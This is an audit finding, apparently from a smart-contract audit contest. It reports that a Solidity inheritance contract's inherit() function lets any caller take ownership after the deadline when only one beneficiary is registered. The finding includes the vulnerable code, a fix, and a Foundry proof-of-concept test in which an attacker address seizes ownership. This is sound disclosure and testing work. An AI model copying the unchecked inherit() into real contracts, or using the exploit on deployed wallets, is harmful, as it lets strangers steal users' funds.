Beginner Friendly, Solidity
Submission Details
Severity: high
Valid

Single Beneficiary Inheritance Logic Flaw

Summary: The inherit() function contains a logic flaw: when exactly one beneficiary is registered, any caller can claim ownership of the contract after the inactivity deadline has passed, not just the registered beneficiary.

Vulnerability Details: When exactly one beneficiary is registered, inherit() assigns ownership to msg.sender without checking that msg.sender is that beneficiary. The only precondition enforced is that the inactivity deadline has passed, and that condition is the same for every caller:

    function inherit() external {
        // Only precondition: the inactivity timelock has expired.
        if (block.timestamp < getDeadline()) {
            revert InactivityPeriodNotLongEnough();
        }
        if (beneficiaries.length == 1) {
            // Single-beneficiary path: ownership goes to whoever called,
            // with no check that msg.sender == beneficiaries[0].
            owner = msg.sender;
            _setDeadline();
        } else if (beneficiaries.length > 1) {
            // Multi-beneficiary path: flags the estate as inherited.
            isInherited = true;
        } else {
            revert InvalidBeneficiaries();
        }
    }

Impact: High. Once the inactivity timelock expires, any account (EOA or contract) can call inherit() on a wallet with a single registered beneficiary and become its owner, taking control of the contract and everything it controls. No privileges are required beyond sending one transaction after the deadline, and the intended beneficiary is left with nothing.

Tools Used

Recommendations: Restrict the single-beneficiary path so that only the registered beneficiary can inherit. The same check can be applied to the multi-beneficiary path so that only a listed beneficiary can trigger inheritance. Note that the NotBeneficiary(address) custom error used below is not in the snippet above and must be declared alongside the contract's existing errors:

    // Requires: error NotBeneficiary(address caller); declared in the contract.
    function inherit() external {
        if (block.timestamp < getDeadline()) {
            revert InactivityPeriodNotLongEnough();
        }
        if (beneficiaries.length == 1) {
            // Single beneficiary: only that address may claim ownership.
            if (msg.sender != beneficiaries[0]) {
                revert NotBeneficiary(msg.sender);
            }
            owner = msg.sender;
            _setDeadline();
        } else if (beneficiaries.length > 1) {
            // Multiple beneficiaries: only a listed beneficiary may trigger inheritance.
            bool isBeneficiary = false;
            for (uint256 i = 0; i < beneficiaries.length; i++) {
                if (msg.sender == beneficiaries[i]) {
                    isBeneficiary = true;
                    break;
                }
            }
            if (!isBeneficiary) {
                revert NotBeneficiary(msg.sender);
            }
            isInherited = true;
        } else {
            revert InvalidBeneficiaries();
        }
    }
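The following Foundry test is an added proof of concept, not part of the original submission or the audited codebase. It uses a minimal stand-in contract that reproduces only the inherit() logic shown above (the contract name, constructor, the 90-day TIMELOCK value and the public owner getter are assumptions), with a flag to toggle the recommended single-beneficiary check. The first test shows an unrelated attacker taking ownership after the deadline; the second shows the hardened path rejecting the attacker and accepting the registered beneficiary.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Stand-in for the audited contract: only the state and logic needed to
// reproduce the flaw. Names and the TIMELOCK value are assumptions.
contract InheritanceStandIn {
    error InactivityPeriodNotLongEnough();
    error InvalidBeneficiaries();
    error NotBeneficiary(address caller);

    uint256 public constant TIMELOCK = 90 days; // assumed inactivity period
    address public owner;
    address[] public beneficiaries;
    uint256 internal deadline;
    bool public isInherited;
    bool internal immutable hardened; // true = apply the recommended check

    constructor(address[] memory _beneficiaries, bool _hardened) {
        owner = msg.sender;
        beneficiaries = _beneficiaries;
        hardened = _hardened;
        _setDeadline();
    }

    function getDeadline() public view returns (uint256) {
        return deadline;
    }

    function _setDeadline() internal {
        deadline = block.timestamp + TIMELOCK;
    }

    function inherit() external {
        if (block.timestamp < getDeadline()) {
            revert InactivityPeriodNotLongEnough();
        }
        if (beneficiaries.length == 1) {
            // Recommended fix, enabled only when `hardened` is true.
            if (hardened && msg.sender != beneficiaries[0]) {
                revert NotBeneficiary(msg.sender);
            }
            owner = msg.sender;
            _setDeadline();
        } else if (beneficiaries.length > 1) {
            isInherited = true;
        } else {
            revert InvalidBeneficiaries();
        }
    }
}

contract InheritPoC is Test {
    address internal beneficiary = makeAddr("beneficiary");
    address internal attacker = makeAddr("attacker");

    // Deploys a wallet with exactly one registered beneficiary.
    function _deploy(bool hardened) internal returns (InheritanceStandIn im) {
        address[] memory b = new address[](1);
        b[0] = beneficiary;
        im = new InheritanceStandIn(b, hardened);
    }

    function test_AnyoneCanInheritWithSingleBeneficiary() public {
        InheritanceStandIn im = _deploy(false);
        vm.warp(im.getDeadline()); // inactivity timelock has just expired
        vm.prank(attacker);        // arbitrary, unrelated caller
        im.inherit();
        assertEq(im.owner(), attacker); // attacker now owns the contract
    }

    function test_FixRejectsNonBeneficiary() public {
        InheritanceStandIn im = _deploy(true);
        vm.warp(im.getDeadline());

        vm.prank(attacker);
        vm.expectRevert(
            abi.encodeWithSelector(InheritanceStandIn.NotBeneficiary.selector, attacker)
        );
        im.inherit(); // reverts, ownership unchanged

        vm.prank(beneficiary);
        im.inherit(); // registered beneficiary succeeds
        assertEq(im.owner(), beneficiary);
    }
}
```

Run with `forge test --match-contract InheritPoC -vv`. Warping to exactly getDeadline() is the earliest block at which `block.timestamp < getDeadline()` is false, so the test exercises the boundary the timelock check is meant to guard.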
Updates

Lead Judging Commences

0xtimefliez Lead Judge 5 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Inherit depends on msg.sender so anyone can claim the contract
